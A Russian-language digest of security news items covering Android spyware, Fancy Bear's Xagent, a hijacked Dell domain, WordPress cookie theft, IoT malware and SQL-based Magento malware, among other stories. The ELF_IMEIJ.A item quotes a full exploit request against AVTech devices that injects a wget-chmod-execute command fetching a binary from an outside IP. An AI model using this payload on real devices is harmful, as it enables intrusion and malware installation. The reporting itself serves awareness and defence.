Поиск

Исследователи безопасности из фирмы RiskIQ обнаружили вредоносную кампанию, ориентированную на пользователей Android-устройств. Программа для хищения данных, размещенная в Google Play Store, замаскирована под приложение для уменьшения расхода заряда батареи. Android-приложение под названием Advanced Battery Saver после установки действительно уменьшает расход заряда, увеличивает время работы и закрывает ненужные сторонние приложения. Однако, по словам исследователей, приложение также получает разрешение на доступ к конфиденциальным данным журнала, получение SMS-сообщений и полный доступ к сети. Помимо этого, в фоновом режиме программа показывает рекламу, обманом заставляя пользователей нажимать на объявления и ссылки, а также собирает информацию об устройстве, включая номер телефона, IMEI, данные о модели, производителе, местоположении и пр. В настоящее время вредоносное приложение Advanced Battery Saver загрузило более 50 тыс. пользователей по всему миру. Исследователи попытались установить личность автора вредоносного ПО на основе адреса электронной почты, доступного в разделе дополнительной информации приложения, и выяснили, что тот же разработчик также загрузил связанное с криптовалютой приложение в Play Store, которое уже удалено.

Абдулинский районный суд (Оренбургская область) принял к производству уголовное дело, подобных которому в его практике ранее не встречалось. Дело было заведено в отношении школьника, не только создавшего вредоносное ПО, но и успешно продавшего его заграничному покупателю. Ранее за обвиняемым никаких правонарушений не числилось. Парень учился хорошо и был практически отличником. Ему хорошо удавались точные науки, и в один прекрасный день он решил использовать свои знания, чтобы заработать кругленькую сумму. Полученный «капитал» школьник планировал приумножить в online-играх и на тотализаторе. Как сообщает пресс-служба Абдулинского районного суда, к концу мая прошлого года школьник закончил работу над ПО, позволяющим получать удаленный доступ к чужим компьютерам, удалять, копировать, изменять имеющуюся на них информацию, а также нейтрализовать средства защиты. Парень выставил свой продукт на продажу на одном из форумов, и покупатель не заставил себя ждать. За разработанный школьником вредонос он заплатил $1250 в биткойнах. После обмена криптовалюты с учетом вычета комиссионных школьник получил 60 тыс. рублей. За полученные деньги парень должен был передать программу покупателю, однако ему помешали сотрудники ФСБ. Школьнику было предъявлено обвинение в совершении преступления, предусмотренного ч.2 ст.ст. 273 («Создание, использование и распространение вредоносных компьютерных программ, совершенные из корыстной заинтересованности»).

Исследователи безопасности из компании Barracuda сообщили о новой мошеннической кампании, в ходе которой злоумышленники рассылают вредоносные письма, замаскированные под PDF-документы, якобы отправленные принтерами и сканерами HP, Epson и Canon. Специалисты обнаружили кампанию в ноябре 2017 года. Эксперты зафиксировали несколько миллионов попыток заражения. Как пояснили эксперты, большинство современных принтеров имеют функцию отправки отсканированного документа на электронную почту. Поскольку данная практика довольно распространена, множество пользователей считают отправленные принтером электронные письма с вложением в виде PDF-документа полностью безопасными, чем и пользуются злоумышленники. В ходе новой вредоносной кампании мошенники рассылают сообщения, замаскированные под электронные письма якобы от принтеров и сканеров крупных производителей, таких как Canon, Epson и HP. В теме таких писем указано "Scanned from HP," "Scanned from Epson," или "Scanned from Canon". Сами же сообщения содержат вложение в виде вредоносного PDF-документа. По словам исследователей, чтобы избежать обнаружения антивирусными решениями, вредоносное ПО использует различные методы, в том числе эксплуатирует уязвимость в WinRAR, позволяющую изменить расширение файлов. Таким образом программа может успешно маскироваться под файлы с расширением .txt, .jpg и пр. Вредонос позволяет злоумышленникам следить за пользователем, а также получить контроль над устройством жертвы, в том числе изменять настройки компьютера, просматривать и копировать файлы, получить доступ к подключенным системам и пр.

Исследователи безопасности из компании ESET сообщили о появлении нового функционала во вредоносном ПО Xagent - одном из основных инструментом хакерской группировки Fancy Bear. Бэкдор с модульной структурой Xagent уже несколько лет является одним из основных инструментов, использующихся в кампаниях Fancy Bear. Первоначальные версии инструмента были разработаны для взлома систем под управлением ОС Windows и Linux, однако за последние два года вредоносное ПО было несколько раз обновлено, и теперь поддерживвает iOS, Android и macOS. Последняя версия вредоносного ПО использует новые методы обфускации данных. По словам исследователей, во вредоносе значительно улучшились способы шифрования. Помимо этого, Fancy Bear обновила часть кода, используемого для связи с C&C-серверами и добавила новый алгоритм генерации домена (DGA) для быстрого создания резервных C&C-серверов. Как пояснили эксперты, новый алгоритм шифрования позволяет значительно усложнить процесс анализа бэкдора, а реализация DGA сильно мешает отключению вредоносных серверов, из-за их большого количества. Хакеры также добавили в бэкдор новые команды, которые могут использоваться для сокрытия данных конфигурации вредоноса и другой информации на целевой системе. Авторы вредоносного ПО переработали ряд старых компонентов, усложнив таким образом задачу по распознаванию уже известных механизмов. Помимо этого, Xagent теперь имеет функцию создания скриншотов рабочего стола. Изменения в Xagent позволяют Fancy Bear в первую очередь избежать обнаружения, отметили исследователи. В остальном тактика группировки осталась неизменной. Хакеры по-прежнему полагаются на использование фишинговых писем, содержащих ссылки на вредоносные ресурсы. Также хакеры стали чаще использовать набор эксплоитов DeralersChoice, эксплуатирующий уязвимости в Adobe Flash. Как и предыдущий набор эксплойтов Sedkit, DealersChoice предназначен для анализа международных новостных публикаций и упоминания наиболее популярных тем во вредоносных письмах, которые программа генерирует и отправляет потенциальным жертвам. Исследователи также отметили, что основными объектами атак группировки все еще остаются государственные учреждения и посольства по всему миру и особенно в Восточной Европе.

Компания Positive Technologies выпустила новую версию PT MultiScanner — многопоточной системы выявления вредоносного контента. PT MultiScanner позволяет значительно повысить точность и оперативность обнаружения угроз за счёт многопоточного сканирования несколькими антивирусными ядрами в сочетании с другими методами выявления, включая ретроспективный анализ действий вредоносных файлов в системе, а также репутационные сервисы. Новая версия PT MultiScanner может локализовать и блокировать передачу вредоносных объектов непосредственно в почтовом потоке, а также объединять выявленное по всей инфраструктуре вредоносное программное обеспечение в одну угрозу заражения. Это позволяет значительно повысить эффективность расследования и реагирования на инциденты заражения и даёт возможность отслеживать распространение вредоносного ПО в инфраструктуре. Система получила усовершенствованную архитектуру: платформа способна обрабатывать до 150 тысяч файлов в час в потоковом режиме. В PT MultiScanner появилась возможность использования чёрных и белых списков: можно применять как уже готовые варианты, так и создавать собственные. Вся актуальная информация об объектах — заблокированных, пропущенных или выявленных в рамках ретроспективного анализа — в новой версии продукта отображается в единой панели статистики. Это значительно повышает скорость реагирования оператора на выявленные в сети угрозы заражения. Ресурсы системы не простаивают даже при отсутствии загрузки (например, в нерабочие часы): автоматически запускается ретроспективный анализ, благодаря чему исключается вероятность влияния на производительность системы в часы пиковой нагрузки.

Web-сайт компании Dell, оказывающий помощь жертвам вредоносного ПО, в течение нескольких недель находился под контролем киберпреступников. Об этом вчера сообщил журналист Брайан Кребс, специализирующийся на расследовании киберпреступлений. На компьютерах производства Dell виртуально установлена программа Dell Backup and Recovery Application, позволяющая в случае необходимости восстановить на устройстве заводские настройки. Программа периодически обращается к домену DellBackupandRecoveryCloudStorage.com, который до недавнего времени был главным решением, если дело касалось резервного копирования, восстановления и хранения в облаке пользовательских данных. Прошлым летом домен был «угнан» у постоянного подрядчика Dell, техасской компании SoftThinks.com, зарегистрировавшей его в 2013 году. Прежде чем подрядчику удалось вернуть контроль над доменом, он, вероятно, в течение месяца использовался злоумышленниками для распространения вредоносного ПО. Каким образом киберпреступники получили контроль над сайтом, неизвестно. По всей видимости, SoftThinks.com забыла продлить регистрацию домена в июне 2017 года. С начала июня до начала июля домен DellBackupandRecoveryCloudStorage.com был собственностью некоего Дмитрия Вассилева из зарегистрированной в Германии компании TeamInternet.com. Судя по всему, компания занимается тайпосквоттингом. Сама компания могла ничего не делать с доменом, а просто сдать или перепродать его третьим лицам. Спустя две недели после «угона» хостинговый сервер начал отображать уведомления о наличии вредоносного ПО. Тайпсквоттинг (typosquatting от англ. type – печатать и squatting – нелегальное завладение чужим домом) – регистрация доменных имен, созвучных с названиями популярных сайтов. Обычно делается в расчете на опечатку пользователя при наборе URL. Если пользователь ошибется и введет в адресную строку другой символ, то попадет совсем на другой сайт с похожим названием.

20-летниий студент из США случайно обнаружил уязвимость на сайте Федеральной комиссии по связи (FCC). Ошибка позволяла любому пользователю прикрепить файл с произвольным расширением и опубликовать ссылку на него в качестве публичного комментария на сайте ведомства. По словам исследователя, уязвимость позволяла загружать произвольные файлы на сервер FCC размером до 25 МБ. Таким образом, злоумышленники легко могли распростронять вредоносное ПО через официальный сайт Федеральной комиссии по связи США. Уязвимость, как предполагается, присутствовала около 5 месяцев. Проблема заключалась в отсутствии проверки типов загружаемых файлов в публичном API. Доступ к API предоставлялся с помощью ключа, отправляемого по запросу пользователя на его электронную почту. В настоящее время FCC проводит расследование инцидента.

18-летнему жителю Великобритании Джеку Чэппеллу предъявлены обвинения в создании web-сервиса, предлагавшего вредоносное ПО, которое использовалось для атак на сайты ведущих мировых компаний, в том числе T-Mobile, EE, Vodafone, O2, BBC, BT, Amazon, Netflix, Virgin Media, а также на ресурс Национального агентства по борьбе с преступностью Великобритании. По данным следствия, Чэппелл не только обеспечивал хакеров вредоносными программами для осуществления DoS-атак, но также предоставлял услуги техподдержки. Согласно сообщению британской полиции, молодому человеку предъявлены обвинения в нарушении «Закона о ненадлежащем использовании компьютера» (Computer Misuse Act), поощрении или содействии в кибератаках, а также в отмывании денег. Как отмечается, в результате атак, к которым был причастен Чэппелл, данные клиентов компаний не пострадали.

Специалисты компании Sucuri обнаружили новый вид вредоносного ПО, перехватывающего файлы cookie, в легитимном файле JavaScript, маскирующемся под домен WordPress. Для создания фиктивного домена code.wordprssapi[.]com злоумышленники использовали технику под названием тайпсвоттинг (регистрация доменов, схожих написанием с уже раскрученными сайтами), также известную как перехват URL. Практика часто применяется киберпреступниками с целью привлечь посетителей на свои ресурсы в расчете на то, что пользователи ошибутся при вводе адреса какого-либо популярного сайта. В данном случае фальшивый сайт выглядит как настоящий домен WordPress и не вызывает подозрений.По словам аналитика Sucuri Сезара Анхоса, злоумышленники внедрили вредоносный код в файл JavaScript, предназначенный для перенаправления конфиденциальной информации, такой как файлы cookie, на фальшивый домен. По всей вероятности, для внедрения обфусцированного кода атакующие проэксплуатировали одну из уязвимостей в платформе WordPress. «Современные преступники редко используют одну уязвимость. Обычно они ищут многочисленные известные уязвимости (в основном в темах и плагинах сторонних производителей), а затем эксплуатируют то, что находят», - пояснил старший аналитик Sucuri Денис Синегубко. В ходе анализа кода Анхос обнаружил условный оператор, исключающий cookie-файлы из поля User-Agent поисковых роботов. Данная мера позволяет скрипту отсеять данные cookie и отправлять злоумышленникам только ценную информацию. Похитив файлы cookie пользователя, атакующий под его видом может выполнять различные действия по крайней мере до тех пор, пока разрешения пользователя не будут отозваны. В настоящее время исследователям неизвестно, кто может стоять за вышеописанной атакой.

Неизвестные хакеры взломали принадлежащий террористической организации ДАИШ (ИГИЛ, запрещена в РФ) пропагандистский сайт Amaq и внедрили в него вредоносное ПО, заражающее посетителей ресурса. Администраторы сайта уведомили своих пользователей об инциденте в среду, 29 марта. «Внимание! Сайт Amaq был взломан и теперь запрашивает загрузку вирусного файла под видом установщика Flash», - говорится в уведомлении. Ресурс используется ДАИШ для распространения пропагандистский материалов, а также «официальных» видео и новостей. Независимый исследователь безопасности Рафаэль Глук предоставил журналистам Motherboard образец заразившего сайт вредоносного ПО. Согласно Virus Total, файл с простым именем FlashPlayer_x86.exe детектируется как вредоносный целым рядом антивирусных продуктов. Многие решения определяют его как распространенный троян или бэкдор для Windows. По словам исследователя из Core Security Уиллиса Макдональда, вредонос представляет собой дроппер для трояна Bladabindi, также известного как NJRat. Bladabindi способен похищать конфиденциальную информацию, предоставлять злоумышленникам удаленный доступ к зараженной системе, делать скриншоты, фотографировать и записывать видео с web-камеры компьютера, фиксировать нажатия клавиш на клавиатуре и передавать файлы. Bladabindi известен с 2013 года и является очень распространенным трояном. Билдер вредоноса ранее утек в Сеть, а серверы можно бесплатно достать на хакерских форумах, поэтому злоумышленники могут создавать собственные кастомизированные трояны для удаленного доступа (RAT). Кто стоит за взломом пропагандистского сайта, пока неизвестно. Учитывая, что Bladabindi очень популярен у киберпреступных группировок Среднего Востока, вряд ли хакеры целенаправленно атаковали ДАИШ. Скорее всего, Amaq был взломан в рамках более широкой кампании.

Долгое время ОС на базе ядра Linux остаются приоритетными у производителей устройств «Интернета вещей» (IoT). В связи с этим для Linux появляются все новые и новые угрозы. В прошлом году большую известность приобрело вредоносное ПО Mirai, инфицирующее IoT-устройства и включающее их в ботнет. Исследователи Trend Micro сообщили о новом образце вредоносного ПО для Linux под названием ELF_IMEIJ.A (по классификации Trend Micro). Вредонос эксплуатирует известные уязвимости в системах безопасности производства крупной тайваньской компании AVTech. Проблемы были обнаружены экспертами Search-Lab. Исследователи пытаются связаться с производителем еще с октября 2016 года, однако безуспешно. Уязвимости в устройствах AVTech позволяют выполнить удаленный файл на стороне атакуемого сервера с помощью скриптов cgi-bin. С целью проэксплуатировать уязвимость злоумышленник отправляет на произвольный IP-адрес запрос POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http:// 192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1. С помощью уязвимости хакер может внедрить команду и запустить процесс загрузки на устройство вредоносного ПО. Точкой входа для ELF_IMEIJ.A служат IP-камеры, системы видеонаблюдения и сетевые записывающие устройства производства AVTech. Попав на устройство, вредонос собирает данные о системе и сетевой активности. ПО также способно получать от киберпреступников команды и выполнять их, например, для запуска DDoS-атаки или самоуничтожения. Устройства, находящиеся в одной сети с зараженным, также подвергаются опасности.

Корпорация Apple разорвала контракт со одним из своих поставщиков после того, как на одном из серверов производства Super Micro Computer, использующихся в лаборатории дизайна компании, было обнаружено вредоносное ПО, замаскированное под обновление прошивки. Сервер являлся частью инфраструктуры, отвечающей за работу web-сервисов и хранение данных клиентов Apple. По данным ресурса The Information, инцидент произошел в середине 2016 года. В качестве ответной меры Apple удалила все серверы производства Super Micro Computer из своих дата-центров, а также вернула производителю все недавно приобретенные системы. Как утверждают знакомые с ситуацией источники, вредоносная прошивка была загружена непосредственно с сайта техподдержки Super Micro Computer. На момент написания новости прошивка с вредоносным ПО все еще оставалась на сайте техподдержки. Представители Apple опровергли информацию об инциденте, но вице-президент Super Micro Computer Тау Ленг подтвердил, что компания прекратила сотрудничество с поставщиком в связи с компрометацией систем. По его словам, Apple - единственная компания, чьи серверы были инфицированы вредоносным ПО. Ленг также добавил, что в ответ на просьбу предоставить информацию о прошивке, инженеры Apple указали неверный номер ее версии, а затем и вовсе отказались сообщать какую-либо информацию.

Нидерландские исследователи по безопасности Ерун Бурсма и Виллем де Гроот обнаружили новое семейство вредоносного ПО, атакующего интернет-магазины, работающие на базе платформы Magento. Основной особенностью вредоноса является то, что он написан на языке SQL и обладает функцией самовосстановления. По словам Виллема де Гроота, вредоносная программа запускается каждый раз при размещении пользователями нового заказа. Затем вредоносный триггер базы данных (набор SQL-инструкций, также известный как хранимая процедура) проверяет наличие вредоносного кода JavaScript программы в заголовке, в Footer и разделе «Копирайт» сайта. Кроме того, проверяются различные блоки CMS Magento, где также может содержаться вредоносный код. Если скрипты не обнаружены, вредонос внедряет их повторно.Это первый случай, когда вредоносое ПО для Magento демонстрирует «самовосстанавливающееся» поведение, отметил эксперт. «Ранее вредоносное ПО содержалось в базах данных, но только в виде текста. Вы можете просканировать дамп базы данных и определить, есть там вредоносы или нет. Но сейчас вредоносное ПО исполняется в базе данных. Это впервые, когда я столкнулся с вредоносной программой, написанной на SQL», - пояснил де Гроот. Вредонос также содержит JS- и PHP скрипты для хищения данных о кредитных картах пользователей. По словам исследователя, инфицирование сайтов осуществляется посредством брутфорс-атаки на URL /rss/catalog/notifystock/.